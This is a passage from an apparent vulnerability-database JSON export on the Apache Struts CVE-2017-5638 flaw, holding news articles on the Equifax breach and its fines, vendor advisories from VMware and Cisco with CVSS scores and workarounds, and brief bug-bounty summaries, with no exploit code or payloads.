$2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2023-12-03T16:01:58", "description": "Remote code execution vulnerability via Apache Struts 2\n\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2017-5638 to this issue. Column 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T00:00:00", "type": "vmware", "title": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-28T00:00:00", "id": "VMSA-2017-0004.7", "href": "https://www.vmware.com/security/advisories/VMSA-2017-0004.7.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-06T16:05:27", "description": "Remote code execution vulnerability via Apache Struts 2\n\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier [CVE-2017-5638](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) to this issue. \n \nColumn 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "vmware", "title": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-28T00:00:00", "id": "VMSA-2017-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2017-0004.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T16:02:09", "description": "a. Critical JMX issue when deserializing authentication credentials", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-17T00:00:00", "type": "vmware", "title": "VMware product updates address critical and important security issues", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2077", "CVE-2016-3427"], "modified": "2016-11-22T00:00:00", "id": "VMSA-2016-0005.5", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0005.5.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:40:42", "description": "**a. Critical JMX issue when deserializing authentication credentials**\n\nThe RMI server of Oracle JRE JMX deserializes any class when deserializing authentication credentials. This may allow a remote, unauthenticated attacker to cause deserialization flaws and execute their commands.\n\n**Workarounds CVE-2016-3427**\n\nvCenter Server\n\nApply the steps of VMware Knowledge Base article 2145343 to vCenterServer 6.0 on Windows. See the table below for the specific vCenterServer 6.0 versions on Windows this applies to.\n\nvCloud Director\n\nNo workaround identified\n\nvSphere Replication\n\nNo workaround identified\n\nvRealize Operations Manager (non-appliance)\n\nThe non-appliance version of vRealize Operations Manager (vROps), which can be installed on Windows and Linux has no default firewall. In order to remove the remote exploitation possibility, access to the following external ports will need to be blocked on the system where the non-appliance version of vROps is installed:\n\n\\- vROps 6.2.x: port 9004, 9005, 9006, 9007, 9008\n\n\\- vROps 6.1.x: port 9004, 9005, 9007, 9008\n\n\\- vROps 6.0.x: port 9004, 9005\n\nNote: These ports are already blocked by default in the applianceversion of vROps.\n\nvRealize Infrastructure Navigator\n\nNo workaround identified\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2016-3427 to this issue.\n\nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "cvss3": {}, "published": "2016-05-17T00:00:00", "type": "vmware", "title": "VMware product updates address critical and important security issues.", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3427", "CVE-2016-2077"], "modified": "2016-11-22T00:00:00", "id": "VMSA-2016-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0005.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2023-12-03T17:07:22", "description": "On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value.\n\n This vulnerability has been assigned CVE-ID CVE-2017-5638.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2 [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-10T19:30:00", "type": "cisco", "title": "Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability Affecting Cisco Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-05T17:02:00", "id": "CISCO-SA-20170310-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-08-01T00:57:28", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. Thank you @n0rb3r7 for notifying us of this vulnerability!\nI was able to leverage a recent, well-known vulnerability to achieve arbitrary, remote command execution on a U.S. Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-06T16:00:44", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T13:22:29", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-31T21:36:13", "id": "H1:213069", "href": "https://hackerone.com/reports/213069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-01T01:06:10", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T17:59:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-01T14:48:16", "id": "H1:212022", "href": "https://hackerone.com/reports/212022", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an 